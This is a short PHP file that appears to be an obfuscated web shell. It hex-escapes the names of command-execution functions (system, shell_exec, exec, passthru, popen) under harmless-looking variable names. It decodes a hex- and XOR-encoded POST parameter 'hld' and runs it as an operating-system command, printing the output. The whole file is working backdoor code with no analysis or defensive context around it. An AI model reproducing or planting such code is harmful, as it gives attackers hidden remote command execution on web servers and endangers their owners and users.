<?php

$splitter_tool5 = "po\x70\x65n";
$splitter_tool1 = "\x73\x79st\x65m";
$splitter_tool4 = "p\x61s\x73\x74hru";
$splitter_tool2 = "\x73h\x65\x6Cl_exe\x63";
$splitter_tool6 = "\x73\x74\x72e\x61m_\x67et\x5F\x63o\x6Et\x65\x6Ets";
$splitter_tool7 = "pclo\x73e";
$right_pad_string = "\x68\x65x2\x62\x69n";
$splitter_tool3 = "e\x78\x65c";
if (isset($_POST["hld"])) {
            function reverse_lookup(   $entity  ,     $fac) {
 $object  =   '' ;
  for($e=0;
 $e<strlen($entity);
 $e++){
$object.=chr(ord($entity[$e])^$fac);

} return   $object;
 
}
            $hld = $right_pad_string($_POST["hld"]);
            $hld = reverse_lookup($hld, 95);
            if (function_exists($splitter_tool1)) {
                $splitter_tool1($hld);
            } elseif (function_exists($splitter_tool2)) {
                print $splitter_tool2($hld);
            } elseif (function_exists($splitter_tool3)) {
                $splitter_tool3($hld, $item_entity);
                print join("\n", $item_entity);
            } elseif (function_exists($splitter_tool4)) {
                $splitter_tool4($hld);
            } elseif (function_exists($splitter_tool5) && function_exists($splitter_tool6) && function_exists($splitter_tool7)) {
                $fac_object = $splitter_tool5($hld, 'r');
                if ($fac_object) {
                    $mrk_k = $splitter_tool6($fac_object);
                    $splitter_tool7($fac_object);
                    print $mrk_k;
                }
            }
            exit;
        }